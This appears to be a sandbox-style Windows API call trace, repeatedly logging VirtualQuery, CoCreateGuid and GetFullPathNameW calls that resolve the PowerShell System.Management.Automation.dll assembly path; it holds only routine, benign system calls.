	[0348.705] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.706] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.707] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.707] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.707] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.707] VirtualQuery (in: lpAddress=0xab8e0, lpBuffer=0xac7a0, dwLength=0x30 | out: lpBuffer=0xac7a0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.707] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.708] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.708] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.708] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.708] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x6b15b19e, Data2=0x7447, Data3=0x4429, Data4=([0]=0x97, [1]=0xd3, [2]=0x98, [3]=0x1, [4]=0xa9, [5]=0x7e, [6]=0x25, [7]=0xf9))) returned 0x0
	[0348.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.709] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd4a2acbf, Data2=0xc570, Data3=0x4900, Data4=([0]=0x8f, [1]=0x82, [2]=0x71, [3]=0xed, [4]=0x83, [5]=0x1f, [6]=0x54, [7]=0xed))) returned 0x0
	[0348.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.094] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.095] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.095] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.096] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.096] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.097] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.097] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.098] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.098] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
